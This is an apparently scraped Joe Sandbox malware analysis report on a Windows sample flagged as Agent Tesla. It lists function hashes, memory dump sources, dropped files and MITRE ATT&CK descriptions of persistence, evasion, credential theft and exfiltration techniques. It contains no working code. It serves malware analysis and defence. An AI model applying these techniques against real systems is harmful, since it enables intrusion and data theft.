Instruction ID: 9daf2481aca24153353d98cd08f190acd4f5005deb0a2003d56dd2f079605833
Opcode Fuzzy Hash: 60989437eb31f36a88b24c626a9401e03f262ae62647aa4789d74cd00d0c7935
Instruction Fuzzy Hash: F7E0C270E10208ABDF50CEB4CA4575EB3ADE706204F30C8B5D409CB602E632DE41C780

Non-executed Functions

Function 069D7788 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 069D7D13
$^q, xrefs: 069D7D1F
$^q, xrefs: 069D78AD
$^q, xrefs: 069D7C6A
$^q, xrefs: 069D7D09
$^q, xrefs: 069D78DE
$^q, xrefs: 069D7C5E
$^q, xrefs: 069D78A1
$^q, xrefs: 069D7CFD
$^q, xrefs: 069D78D2

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 67dbeec18da6dca9d6194c5bcd796bf381fb42178cea3bc5bfd7496d7bcd7140
Instruction ID: 2529d3d2e702f771bbdec10ef1ff53225b9b88a1af9a65abc4a214b6d367e341
Opcode Fuzzy Hash: 67dbeec18da6dca9d6194c5bcd796bf381fb42178cea3bc5bfd7496d7bcd7140
Instruction Fuzzy Hash: 16121C30E012198FDB64DFA5C954AADB7B6BF84304F20C97AD409AB754DB309D85CF91

Function 069DAA18 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 069DAB69
$^q, xrefs: 069DABA0
$^q, xrefs: 069DABCA
$^q, xrefs: 069DAB94
$^q, xrefs: 069DAB0E
$^q, xrefs: 069DAB1A
$^q, xrefs: 069DABD6
$^q, xrefs: 069DAB75

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 2915ac1c1f26d2fc63c165d546ed0f7cf94cbf31efb70007fa261e374dc355e7
Instruction ID: 2044d00d8d55724da414f32fcd2e11409728bef25f95f35b7716a26e15b35bf3
Opcode Fuzzy Hash: 2915ac1c1f26d2fc63c165d546ed0f7cf94cbf31efb70007fa261e374dc355e7
Instruction Fuzzy Hash: 5D916D30E002099FDB68DF65DA48B6EBBF6BF84300F20C539E4069B694DB749D55CB90

Function 069D7188 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 069D7690
$^q, xrefs: 069D769C
$^q, xrefs: 069D746A
$^q, xrefs: 069D7624
$^q, xrefs: 069D74D0
$^q, xrefs: 069D74C4
.5vq, xrefs: 069D71E3

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: f4890c9037bf98f0b9e00126c9e199810776fb9a6ae2b47ede4ab87aa1dc01af
Instruction ID: 9c8c97f15c2b91a181aaf4ea47a285ee72881e0b09c01896bf382425ce3ac477
Opcode Fuzzy Hash: f4890c9037bf98f0b9e00126c9e199810776fb9a6ae2b47ede4ab87aa1dc01af
Instruction Fuzzy Hash: 3CF13B30A01209CFDB59EBA8D594B6EB7B7FF84300F24C568D4169B798DB359C86CB81

Function 069D84C0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 069D871A
$^q, xrefs: 069D877F
$^q, xrefs: 069D878B
$^q, xrefs: 069D8726

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 41cab9516ee6e053c0c5b72d7c57237c1ed2df6b81985fc6909c20ede05fddd4
Instruction ID: 87ac7a0ca3d5654852c6463bb089c8cd2527dd1f350ea62c5dcb7242b56765c3
Opcode Fuzzy Hash: 41cab9516ee6e053c0c5b72d7c57237c1ed2df6b81985fc6909c20ede05fddd4
Instruction Fuzzy Hash: BEB12730E012088FDB54EFA8DA9466EB7B6AF84300F24C979D416DB795DB75DC86CB80

Function 069D88D8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 069D8A1A
$^q, xrefs: 069D8963
$^q, xrefs: 069D8957
LR^q, xrefs: 069D89CB

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: b9f6cad04b133f2f46c351ec5dd9ba207c8dd8c463469b986ae9377c12a6038a
Instruction ID: c34022bed90e8cc4a2001c8028e21619365a60423fe448976ad04479f8b23c0a
Opcode Fuzzy Hash: b9f6cad04b133f2f46c351ec5dd9ba207c8dd8c463469b986ae9377c12a6038a
Instruction Fuzzy Hash: D151B130B012019FDB58DB68DA40B6AB7EAFF84314F14C979E416DB79ADA30EC45CB81

Function 069DADA3 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$^q, xrefs: 069DAF53
$^q, xrefs: 069DAF7C
$^q, xrefs: 069DAED1
$^q, xrefs: 069DAF24

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 1c05db64d7cfc591fcb0bd3d911f78dbeff5dcaabc7bc31af114b04248adc8b2
Instruction ID: 2102d42acd5c94918b377a88ef43007f6210d6c082e3d6f5959c0f9ac102130f
Opcode Fuzzy Hash: 1c05db64d7cfc591fcb0bd3d911f78dbeff5dcaabc7bc31af114b04248adc8b2
Instruction Fuzzy Hash: 46519D30E102058FCF65DB68D9846AEB7B6EB84310F24C97AE816DB754DB31DC52CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dhPWt112uC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhPWt112uC.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newapp.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0ahie50.43x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jczfjfho.hp3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb50sxt2.ug4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgtvkp2m.vrw.ps1

C:\Users\user\AppData\Roaming\newapp\newapp.exe

C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier

Static File Info

General

File Icon

Windows Analysis Report
dhPWt112uC.exe

Function 00B7D468 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre